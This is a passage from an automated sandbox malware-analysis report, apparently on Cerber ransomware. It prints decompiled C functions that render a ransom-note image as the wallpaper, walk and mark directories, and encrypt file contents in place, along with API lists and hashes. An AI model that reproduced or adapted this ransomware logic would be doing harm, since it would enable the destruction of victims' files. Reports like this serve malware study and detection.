								_t265 = _t125;
								if(_t125 == 0) {
									L18:
									SelectObject(_v12, _v40);
									DeleteObject(_v32);
									_t230 = _v36;
									goto L19;
								}
								_v60 = SelectObject(_v12, _t125);
								SetBkColor(_v12, E00403253(E004031AF(_v16, _t265, E00405905(0x40d758, 0xa, 0xac908572)), _t265));
								SetTextColor(_v12, E00403253(E004031AF(_v16, _t265, E00405905(0x40d764, 5, 0xb1a3f726)), _t265));
								_t236 = _v24;
								_v56.left = 0;
								_v56.top = 0;
								_v56.right = _t223;
								_v56.bottom = _t236;
								FillRect(_v12,  &_v56, GetStockObject(2));
								_t143 = _t236 * _t223;
								_t207 = 0xa;
								_t144 = _t143 / _t207;
								_t216 = _t143 % _t207;
								if(_t144 <= 0) {
									L11:
									_v80.left = 0;
									_v80.top = 0;
									_v80.right = _t223;
									_v80.bottom = _t236;
									DrawTextA(_v12, _v28, 0xffffffff,  &_v80, 0x411);
									asm("cdq");
									asm("cdq");
									_v56.top = (_v56.bottom - _t216 >> 1) - (_v80.bottom - _t216 >> 1);
									DrawTextA(_v12, _v28, 0xffffffff,  &_v56, 0x11);
									GetObjectW(_v32, 0x18,  &_v160);
									_t210 = 9;
									memset( &_v132, 0, _t210 << 2);
									_t159 = _v156;
									_t212 = _v152;
									_v132 = _t159;
									_v124 = 1;
									_t219 = 0x20;
									_v122 = _t219;
									asm("cdq");
									_t240 = ((_t219 & 0x0000001f) + (_t159 << 5) + 0x1f >> 5) * _t212 << 2;
									_v136 = 0x28;
									_v128 = _t212;
									_v120 = 0;
									_t162 = E004053BD(_t212);
									_v24 = _t162;
									if(_t162 != 0) {
										GetDIBits(_v36, _v32, 0, _v152, _t162,  &_v136, 0);
										_t167 = E00404D43(E0040591C(0x40d780, 4, 0x91fa4d45));
										_v28 = _t167;
										if(_t167 != 0) {
											_t169 = CreateFileW(_t167, 0x40000000, 1, 0, 2, 0x80, 0);
											_v16 = _t169;
											if(_t169 != 0xffffffff) {
												asm("stosd");
												asm("stosd");
												asm("stosd");
												_v94 = _t240 + 0x36;
												_v96 = 0x4d42;
												_v86 = 0x36;
												_v20 = 0;
												WriteFile(_v16,  &_v96, 0xe,  &_v20, 0);
												WriteFile(_v16,  &_v136, 0x28,  &_v20, 0);
												WriteFile(_v16, _v24, _t240,  &_v20, 0);
												CloseHandle(_v16);
												SystemParametersInfoW(0x14, 0, _v28, 3);
											}
											E00405463(_v28);
										}
										E00405463(_v24);
									}
									SelectObject(_v12, _v60);
									DeleteObject(_v64);
									goto L18;
								}
								_v20 = _t144;
								do {
									_v16 = (E004063E1(0xff) & 0x000000ff) << 8;
									_t189 = E004063E1(0xff);
									_t191 = E004063E1(0xff);
									_t195 = E004063E1(_v56.bottom);
									SetPixel(_v12, E004063E1(_v56.right), _t195, _t191 & 0x000000ff | (_t189 & 0x000000ff | _v16) << 0x00000008);
									_t36 =  &_v20;
									 *_t36 = _v20 - 1;
								} while ( *_t36 != 0);
								_t236 = _v24;
								goto L11;
							}
						}
					}
				}
				return _t101;
			}

APIs

Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6

Part of subcall function 004078F0: lstrlen.KERNEL32(00000000,00000000,00000000,00000000), ref: 004078FF
Part of subcall function 004078F0: StrCmpNIA.SHLWAPI(00000000,00000000,?,?,0000000A), ref: 00407938

GetDC.USER32(00000000), ref: 00408A4F
CreateCompatibleDC.GDI32(00000000), ref: 00408A63
GetDeviceCaps.GDI32(00000000,00000008), ref: 00408A77
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00408A82
CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 00408A8E
SelectObject.GDI32({f@,00000000), ref: 00408AA3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00408AB1
MulDiv.KERNEL32(00000000), ref: 00408ADE
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 00408B0C
SelectObject.GDI32(?,00000000), ref: 00408B21
SetBkColor.GDI32(?,00000000), ref: 00408B53

Part of subcall function 00403253: StrToInt64ExA.SHLWAPI(?,00000000,?,F5C6A5FE,?,?,?,00402CB1,?,?,?,00000000,00000000,00406B45,?,00000000), ref: 004032A9

SetTextColor.GDI32(?,00000000), ref: 00408B82
GetStockObject.GDI32(00000002), ref: 00408B99
FillRect.USER32(?,?,00000000), ref: 00408BA7
SetPixel.GDI32(?,00000000,00000000,?), ref: 00408C0A
DrawTextA.USER32(?,?,000000FF,?,00000411), ref: 00408C35
DrawTextA.USER32(?,?,000000FF,?,00000011), ref: 00408C60
GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408C72
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00408CED
CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00408D2A
WriteFile.KERNEL32(?,?,0000000E,?,00000000), ref: 00408D67
WriteFile.KERNEL32(?,00000028,00000028,?,00000000), ref: 00408D7E
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00408D90
CloseHandle.KERNEL32(?), ref: 00408D99
SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 00408DA7
SelectObject.GDI32(?,?), ref: 00408DC3
DeleteObject.GDI32(?), ref: 00408DCC
SelectObject.GDI32(?,?), ref: 00408DD8
DeleteObject.GDI32(?), ref: 00408DE1
DeleteDC.GDI32({f@), ref: 00408DED
ReleaseDC.USER32(00000000,00000000), ref: 00408DF5

Strings

{f@, xrefs: 004089CD
{f@, xrefs: 00408DEA, 00408AA0

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Object$CreateFileSelect$CapsDeleteDeviceTextWrite$ColorCompatibleDraw$BitmapBitsCloseFillFontHandleInfoInt64ParametersPixelRectReleaseStockSystemlstrcmpilstrlen
String ID: {f@${f@
API String ID: 2080757576-3352485320
Opcode ID: d6a56e6b6532c6585c8755897e461db2777add79945ba90acb89a99c47189ff0
Instruction ID: 2856dbb673b69ec4cade2b047b667f652ddefbff5f4d6f99c4febc8329f0e424
Opcode Fuzzy Hash: d6a56e6b6532c6585c8755897e461db2777add79945ba90acb89a99c47189ff0
Instruction Fuzzy Hash: F4C19FB2D00218BFDB10AFA5DD45AAEBBB8EF48311F10457AF601F72E1DB7849058B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A419 Relevance: 28.7, APIs: 19, Instructions: 192
stringfilesleepCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040A419(void* __ecx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, char* _a16) {
				long _v8;
				void* _v12;
				int _v16;
				struct _WIN32_FIND_DATAW _v612;
				short _v1132;
				struct _SECURITY_DESCRIPTOR _v2156;
				void* __ebx;
				void* __esi;
				void* _t54;
				int _t55;
				intOrPtr _t68;
				WCHAR* _t70;
				WCHAR* _t72;
				intOrPtr _t105;
				char* _t106;
				void* _t107;
				int _t108;
				void* _t109;
				void* _t110;

				_t105 = _a4;
				if(_t105 == 0) {
					SetFileAttributesW(_a8, GetFileAttributesW(_a8) | 0x00002000);
					_t54 = E0040591C( &E0040D8B0, 1, 0x126191fd);
					_t110 = _t109 + 0xc;
					_t55 = E00406390(_t54,  &_v1132, _a8);
					_pop(_t102);
					__eflags = _t55;
					if(_t55 != 0) {
						goto L8;
					}
				} else {
					_t55 = E00409381(__ecx, _t105, 0);
					_t108 = _t55;
					if(_t108 != 0) {
						_push(_a8);
						_push(_t108);
						wsprintfW( &_v1132, E0040591C(0x40d7dc, 5, 0x3260f07e));
						_t110 = _t109 + 0x1c;
						E00405463(_t108);
						_t55 = GetFileAttributesW( &_v1132);
						if((_t55 & 0x00000002) == 0) {
							_t102 =  &_v8;
							_v8 = 0x400;
							if(GetFileSecurityW( &_v1132, 1,  &_v2156, 0x400,  &_v8) == 0 || GetSecurityDescriptorOwner( &_v2156,  &_v12,  &_v16) == 0) {
								L6:
								 *((char*)(_t105 + 5)) = 1;
								SetFileAttributesW( &_v1132, GetFileAttributesW( &_v1132) | 0x00002000);
								lstrcatW( &_v1132, 0x40cec8);
								L8:
								_t106 = _a16;
								if( *((char*)(_t106 + 1)) != 0) {
									L10:
									_t55 = FindFirstFileW( &_v1132,  &_v612);
									_v8 = _t55;
									if(_t55 != 0xffffffff) {
										_t107 = 0;
										while(WaitForSingleObject( *0x42f834, 0) != 0) {
											if(E004063BC( &(_v612.cFileName)) != 0 || (_v612.dwFileAttributes & 0x00000400) != 0) {
												L25:
												if(FindNextFileW(_v8,  &_v612) != 0) {
													continue;
												}
												break;
											} else {
												if(_t107 != 0) {
													L17:
													CharLowerBuffW( &(_v612.cFileName), lstrlenW( &(_v612.cFileName)));
													if((_v612.dwFileAttributes & 0x00000010) == 0) {
														_t68 = _v612.nFileSizeHigh;
														_t102 = _v612.nFileSizeLow;
														__eflags = _t68 -  *0x42f7ac; // 0x0
														if(__eflags < 0) {
															goto L25;
														}
														if(__eflags > 0) {
															L22:
															__eflags =  *_t106;
															if( *_t106 == 0) {
																L24:
																_t70 = _a12(_t107,  &_v612, _t106);
																_t110 = _t110 + 0xc;
																__eflags = _t70;
																if(_t70 == 0) {
																	break;
																}
																goto L25;
															}
															_t72 = StrChrW( &(_v612.cFileName), 0x2e);
															__eflags = _t72;
															if(_t72 == 0) {
																goto L25;
															}
															goto L24;
														}
														__eflags = _t102 -  *0x42f7a8; // 0x0
														if(__eflags < 0) {
															goto L25;
														}
														goto L22;
													}
													Sleep(1);
													E0040A419(_t102, _t107,  &(_v612.cFileName), _a12, _t106);
													_t110 = _t110 + 0x10;
													goto L25;
												}
												_t107 = E0040A25A(lstrlenW(_a8), _t102, _a4, _a8, _t106);
												_t110 = _t110 + 0xc;
												if(_t107 == 0) {
													break;
												}
												goto L17;
											}
										}
										return FindClose(_v8);
									}
								} else {
									_t55 = E004094DB( &_v1132);
									_pop(_t102);
									if(_t55 == 0) {
										goto L10;
									}
								}
							} else {
								_t55 = EqualSid(0x42fa80, _v12);
								if(_t55 == 0) {
									goto L6;
								}
							}
						}
					}
				}
				return _t55;
			}

0x0040a425
0x0040a42a
0x0040a527
0x0040a539
0x0040a53e
0x0040a54b
0x0040a551
0x0040a552
0x0040a554
0x00000000
0x00000000
0x0040a430
0x0040a433
0x0040a438
0x0040a43e
0x0040a444
0x0040a447
0x0040a464
0x0040a46a
0x0040a46d
0x0040a479
0x0040a481
0x0040a487
0x0040a491
0x0040a4ac
0x0040a4dd
0x0040a4e4
0x0040a4fb
0x0040a50d
0x0040a55a
0x0040a55a
0x0040a561
0x0040a578
0x0040a586
0x0040a58c
0x0040a592
0x0040a598
0x0040a59a
0x0040a5bd
0x0040a686
0x0040a698
0x00000000
0x00000000
0x00000000
0x0040a5d3
0x0040a5d5
0x0040a5fb
0x0040a610
0x0040a61d
0x0040a63d
0x0040a643
0x0040a649
0x0040a64f
0x00000000
0x00000000
0x0040a651
0x0040a65b
0x0040a65b
0x0040a65e
0x0040a673
0x0040a67c
0x0040a67f
0x0040a682
0x0040a684
0x00000000
0x00000000
0x00000000
0x0040a684
0x0040a669
0x0040a66f
0x0040a671
0x00000000
0x00000000
0x00000000
0x0040a671
0x0040a653
0x0040a659
0x00000000
0x00000000
0x00000000
0x0040a659
0x0040a621
0x0040a633
0x0040a638
0x00000000
0x0040a638
0x0040a5ee
0x0040a5f0
0x0040a5f5
0x00000000
0x00000000
0x00000000
0x0040a5f5
0x0040a5bd
0x00000000
0x0040a6a1
0x0040a563
0x0040a56a
0x0040a56f
0x0040a572
0x00000000
0x00000000
0x0040a572
0x0040a4c7
0x0040a4cf
0x0040a4d7
0x00000000
0x00000000
0x0040a4d7
0x0040a4ac
0x0040a481
0x0040a43e
0x0040a6ab

APIs

wsprintfW.USER32 ref: 0040A464

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: HeapFree.KERNEL32(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

GetFileAttributesW.KERNEL32(?), ref: 0040A479
GetFileSecurityW.ADVAPI32(?,00000001,?,00000400,?), ref: 0040A4A4
GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 0040A4BD
EqualSid.ADVAPI32(0042FA80,?), ref: 0040A4CF
GetFileAttributesW.KERNEL32(?), ref: 0040A4E8
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A4FB
lstrcatW.KERNEL32(?,0040CEC8), ref: 0040A50D
GetFileAttributesW.KERNEL32(?,?,0040A367,00000000), ref: 0040A518
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A527
FindFirstFileW.KERNEL32(?,?), ref: 0040A586
WaitForSingleObject.KERNEL32(00000000), ref: 0040A5A2
lstrlenW.KERNEL32(?,0040A367), ref: 0040A5DB
lstrlenW.KERNEL32(?), ref: 0040A602
CharLowerBuffW.USER32(?,00000000), ref: 0040A610
Sleep.KERNEL32(00000001), ref: 0040A621
StrChrW.SHLWAPI(?,0000002E), ref: 0040A669
FindNextFileW.KERNEL32(?,?), ref: 0040A690
FindClose.KERNEL32(?), ref: 0040A6A1

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$Attributes$Find$ErrorLastSecuritylstrlen$BuffCharCloseDescriptorEqualFirstFreeHeapLowerNextObjectOwnerSingleSleepWaitlstrcatwsprintf
String ID:
API String ID: 3254900428-0
Opcode ID: 0dc60112ac7b66a14e6d56861434c25d3f81de6f7ddc304724af9a2b16f46d05
Instruction ID: 6187f46a005a6f47ffa6dfcf539702b581d4e88321e0c337fcbf86212e5dcf34
Opcode Fuzzy Hash: 0dc60112ac7b66a14e6d56861434c25d3f81de6f7ddc304724af9a2b16f46d05
Instruction Fuzzy Hash: F9618275900219ABDB209BA0DD49FDB777CBF04310F0445BAF909F2190EB3A9A65CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00409857 Relevance: 18.1, APIs: 12, Instructions: 122
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00409857(void* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct _SHFILEINFOW _v708;
				short _v1222;
				short _v1228;
				char _v1748;
				struct _WIN32_FIND_DATAW _v2340;
				char _v2860;
				short _v3380;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t34;
				intOrPtr _t42;
				void* _t51;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t73;
				void* _t75;
				void* _t77;
				void* _t79;

				_t79 = __eflags;
				_t67 = __ecx;
				 *0x40eb10(0);
				GetSystemDirectoryW( &_v1228, 0x104);
				_t74 = 0x2b4;
				SHGetFileInfoW( &_v1228, 0,  &_v708, 0x2b4, 0x400);
				_t34 = E0040AF39(_t67, lstrlenW( &(_v708.szTypeName)) + _t32);
				_pop(_t68);
				_v8 = _t34;
				_v1222 = 0;
				SHGetFileInfoW( &_v1228, 0,  &_v708, 0x2b4, 0x400);
				_t42 = E0040AF39(_t68, lstrlenW( &(_v708.szTypeName)) + _t40);
				_pop(_t69);
				_v12 = _t42;
				 *0x40e798(0, 8, 0, 0,  &_v1748);
				_push( &_v1748);
				_push(E0040591C(0x40d7f4, 8, 0x9d46391f));
				_push( &_v3380);
				E00405A8E(0, 0x400, 0x2b4, _t79);
				_t77 = _t75 + 0x18;
				_t51 = FindFirstFileW( &_v3380,  &_v2340);
				_t73 = _t51;
				_t80 = _t73 - 0xffffffff;
				if(_t73 != 0xffffffff) {
					do {
						_push( &(_v2340.cFileName));
						_push( &_v1748);
						_push(E0040591C(0x40ced4, 5, 0x7f642c43));
						_push( &_v2860);
						E00405A8E(0, _t73, _t74, _t80);
						_push(_v12);
						_push(_v8);
						_push( &_v2860);
						_t74 = E0040972C(0, _t73, _t74, _t80);
						_t77 = _t77 + 0x28;
						_t81 = _t74;
						if(_t74 != 0) {
							CharLowerBuffW(_t74, lstrlenW(_t74));
							E004096CC(_t69, _t81, _t74);
							_pop(_t69);
							E00405463(_t74);
						}
					} while (FindNextFileW(_t73,  &_v2340) != 0);
					return FindClose(_t73);
				}
				return _t51;
			}

APIs

CoInitialize.OLE32(00000000), ref: 00409866
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00409878
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000400), ref: 00409899
lstrlenW.KERNEL32(?), ref: 004098A6
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000400), ref: 004098D8
lstrlenW.KERNEL32(?), ref: 004098E5
SHGetFolderPathW.SHELL32(00000000,00000008,00000000,00000000,?), ref: 00409909
FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00409948

Part of subcall function 0040972C: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000408), ref: 004097E1
Part of subcall function 0040972C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004097EE
Part of subcall function 0040972C: PathFindExtensionW.SHLWAPI(?,?,?,?,?,?,?,?,?,?), ref: 00409814

lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004099A0
CharLowerBuffW.USER32(00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004099A8

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: HeapFree.KERNEL32(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004099C2
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004099CD

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$Findlstrlen$Info$ErrorLastPath$BuffCharCloseDirectoryExtensionFirstFolderFreeHeapInitializeLowerNextSystem
String ID:
API String ID: 2493930338-0
Opcode ID: 0822e2e8c096c2ee9e11d9b7235df1899e2bee36cc35450901059efa43ad0b20
Instruction ID: 98bb2fb97e339870cc37db1ad270d3e311652f1936ccaf0b3fdcbc75b29e6f69
Opcode Fuzzy Hash: 0822e2e8c096c2ee9e11d9b7235df1899e2bee36cc35450901059efa43ad0b20
Instruction Fuzzy Hash: 8D4121B2901118ABDB10ABA0DD89EEF777CEB45314F0405B7B605F2051E6349F488F69

Uniqueness

Uniqueness Score: -1.00%

Function 0040B283 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 127
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040B283(void* __ecx, void* __eflags, intOrPtr _a4, void* _a8, char _a12) {
				char _v5;
				void* _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				void* __esi;
				signed int _t64;
				signed int _t66;
				void* _t68;
				intOrPtr _t71;
				signed int _t72;
				char _t75;
				intOrPtr* _t79;
				intOrPtr* _t86;
				int _t87;
				void* _t88;
				void* _t93;
				void* _t95;
				signed int _t97;
				char _t98;
				char _t99;
				signed int _t101;
				intOrPtr _t104;
				signed int _t105;
				void* _t108;

				_t1 =  &_a12; // 0x402a28
				_t105 = E0040B146(__ecx, _a4);
				_t64 =  *( *_t1);
				_t3 = _t105 - 0xb; // -11
				_t87 = _t3;
				_t97 = _t64 % _t87;
				_t92 = 0 | _t97 != 0x00000000;
				_v36 = _t97;
				_t101 = _t64 / _t87 + (_t97 != 0);
				_v28 = _t101;
				_v40 = _t101 * _t105;
				_t66 = E004053BD(_t97 != 0);
				_v20 = _t66;
				if(_t66 != 0) {
					_t68 = E004053BD(_t92);
					_v12 = _t68;
					if(_t68 != 0) {
						_v24 = _v24 & 0x00000000;
						_t19 =  &_v20; // 0x402a28
						_t104 =  *_t19;
						_v16 = _a8;
						_t71 = _v28 - 1;
						_v5 = 1;
						_v32 = _t71;
						if(_t71 == 0) {
							L8:
							_t72 = _v36;
							_v24 = _t72;
							if(_t72 == 0) {
								_v24 = _t87;
							}
							memcpy(_v12, _v16, _v24);
							_t88 = _v12;
							_t75 =  *0x40fa50(_a4, 0, 1, 0, _t88,  &_v24, _t105);
							if(_t75 == 0) {
								_v5 = _t75;
							}
							_t93 = 0;
							if(_t105 != 0) {
								_t52 = _t88 - 1; // -1
								_t79 = _t105 + _t52;
								do {
									_t98 =  *_t79;
									_t79 = _t79 - 1;
									 *((char*)(_t93 + _t104)) = _t98;
									_t93 = _t93 + 1;
								} while (_t93 < _t105);
							}
							if(_v5 != 0) {
								_t60 =  &_a12; // 0x402a28
								 *( *_t60) = _v40;
							} else {
								goto L16;
							}
						} else {
							while(1) {
								_v28 = _t87;
								memcpy(_v12, _v16, _t87);
								_t108 = _t108 + 0xc;
								 *0x40fa50(_a4, 0, 0, 0, _v12,  &_v28, _t105);
								if(0 == 0) {
									break;
								}
								_t95 = 0;
								if(_t105 != 0) {
									_t32 = _v12 - 1; // -1
									_t86 = _t105 + _t32;
									do {
										_t99 =  *_t86;
										_t86 = _t86 - 1;
										 *((char*)(_t95 + _t104)) = _t99;
										_t95 = _t95 + 1;
									} while (_t95 < _t105);
								}
								_t104 = _t104 + _v28;
								_v16 = _v16 + _t87;
								_v24 = _v24 + 1;
								if(_v24 < _v32) {
									continue;
								} else {
									goto L8;
								}
								goto L18;
							}
							L16:
							_t55 =  &_v20; // 0x402a28
							E00405463( *_t55);
							E00405463(_v12);
							_v20 = _v20 & 0x00000000;
						}
					}
				}
				L18:
				_t61 =  &_v20; // 0x402a28
				return  *_t61;
			}

APIs

Part of subcall function 0040B146: CryptGetKeyParam.ADVAPI32(?,00000009,004029D6,?,00000000,0040D17C,004029D6,004029D6,?,0040273B,00000000,80C426C8,?,00000000), ref: 0040B166

memcpy.NTDLL(00000000,00000000,-0000000B,80C426C8,00000000,?), ref: 0040B301
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,80C426C8,00000000,?), ref: 0040B319
memcpy.NTDLL(00000000,00000000,00000000,80C426C8,00000000,?), ref: 0040B366
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,80C426C8,00000000,?), ref: 0040B380

Strings

(*@, xrefs: 0040B3C6, 0040B2E4, 0040B3A8
(*@, xrefs: 0040B289, 0040B3C1

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Crypt$Encryptmemcpy$Param
String ID: (*@$(*@
API String ID: 673012589-2671997973
Opcode ID: 7a4236b57eb6ddee40509aff3a651f68f0ba7db94422606a0f75ca3171f2a96d
Instruction ID: 54093158f1a825de50d9d814c6b244fb5fab6a3abbe75fd9e2e92e6b8b7ee4fc
Opcode Fuzzy Hash: 7a4236b57eb6ddee40509aff3a651f68f0ba7db94422606a0f75ca3171f2a96d
Instruction Fuzzy Hash: 2D415771D0020AAFDF11DFA5C881AEFBBB9EF44704F24407AE801B7291D7359E458BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040194B Relevance: 10.6, APIs: 7, Instructions: 100
fileencryptionsleepCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040194B(void* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20, union _LARGE_INTEGER _a24, union _LARGE_INTEGER* _a28) {
				struct _OVERLAPPED* _v5;
				signed char _v12;
				char _v16;
				char _v20;
				long* _v24;
				long _v28;
				long _v32;
				void* __esi;
				long* _t44;
				struct _OVERLAPPED* _t62;
				void* _t63;
				intOrPtr _t68;
				intOrPtr _t70;
				long _t71;
				void* _t72;

				_t62 = 0;
				_t44 = E0040AF8D( *0x42f7a4 & 0x0000ffff, _a8);
				_pop(_t63);
				_v24 = _t44;
				if(_t44 == 0) {
					L9:
					return _t62;
				}
				_t68 = _a12;
				_v20 = 0;
				_v16 = 0;
				_v5 = 1;
				_v12 = 0;
				while(_t68 != _t62) {
					_t70 =  *0x42f7d8; // 0x0
					_v12 = _v12 + 1;
					_push(_t62);
					_t71 =  <  ? _t68 : _t70;
					_t68 = _t68 - _t71;
					SetFilePointerEx(_a4, _a24.LowPart, _a28, _t62);
					ReadFile(_a4, _a16, _t71,  &_v32, _t62);
					E0040ADF6(_t63, _a16,  &_v20,  &_v16, _t71);
					_t72 = _t72 + 0xc;
					_push(_t71);
					_push( &_v28);
					_push(_a16);
					_push(_t62);
					_v28 = _t71;
					_push(0 | _t68 == _t62);
					_push(_t62);
					_push(_v24);
					if( *0x40fa50() == 0) {
						_v5 = _t62;
						L8:
						 *((intOrPtr*)(_a20 + 4)) = E0040AEED(_v16, _v20, _a12);
						CryptDestroyKey(_v24);
						_t62 = _v5;
						goto L9;
					}
					_push(_t62);
					SetFilePointerEx(_a4, _a24.LowPart, _a28, _t62);
					WriteFile(_a4, _a16, _t71,  &_v32, _t62);
					_a24.LowPart = _a24 + _t71;
					asm("adc [ebp+0x20], ebx");
					if((_v12 & 0x00000001) == 0) {
						Sleep(1);
					}
				}
				goto L8;
			}

APIs

Part of subcall function 0040AF8D: memcpy.NTDLL(?,?,00000010,0001A2AC), ref: 0040AFC6
Part of subcall function 0040AF8D: CryptImportKey.ADVAPI32(00000208,0000001C,00000000,00000000,00000000,?,?,0001A2AC), ref: 0040AFE2

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 004019A1
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004019B3
CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000), ref: 004019E5
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 004019FA
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00401A0C
Sleep.KERNEL32(00000001), ref: 00401A20
CryptDestroyKey.ADVAPI32(?), ref: 00401A4B

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$Crypt$Pointer$DestroyEncryptImportReadSleepWritememcpy
String ID:
API String ID: 1821214037-0
Opcode ID: 584aa682ed8e0e52711135a3264aa759251664396659cda2042a4cbfd36ba68c
Instruction ID: 18c608ade0755fad8d0103536e9642e00f749d4286a3dbf0ab3fd0c468255ba2
Opcode Fuzzy Hash: 584aa682ed8e0e52711135a3264aa759251664396659cda2042a4cbfd36ba68c
Instruction Fuzzy Hash: B63134B290121AAFCF119FA4DD849EF7F79EF48304F00407AF905A2161D7368A69DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B17E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040B17E(char _a4) {
				void* _v8;
				char _v12;
				char _v16;
				void* _v20;
				void* __edi;
				void* __esi;
				void* _t14;
				void* _t16;
				void* _t39;

				_v16 = 0;
				_t14 = E0040B11B();
				_t44 = _t14;
				if(_t14 != 0) {
					_t16 = E00405905(0x40d944, 0x11, 0xd0371e50);
					_t2 =  &_a4; // 0x4029e6
					_t36 = E00401127(0, E004032B8(E004031AF( *_t2, _t44, _t16), _t44));
					if(_t21 != 0) {
						_t3 =  &_v12; // 0x4029e6
						_v12 = 0;
						_t39 = E00401127(_t3, _t36);
						if(_t39 != 0) {
							_push( &_v20);
							_push( &_v8);
							_push(0);
							_push(0x8000);
							_t7 =  &_v12; // 0x4029e6
							_push( *_t7);
							_v8 = 0;
							_push(_t39);
							_push(8);
							_push(0x10001);
							_v20 = 0;
							if( *0x40f918() != 0) {
								 *0x40f804( *0x42faf8, 1, _v8,  &_v16);
								LocalFree(_v8);
							}
							E00405463(_t39);
						}
						E00405463(_t36);
					}
				}
				return _v16;
			}

0x0040b187
0x0040b18a
0x0040b18f
0x0040b191
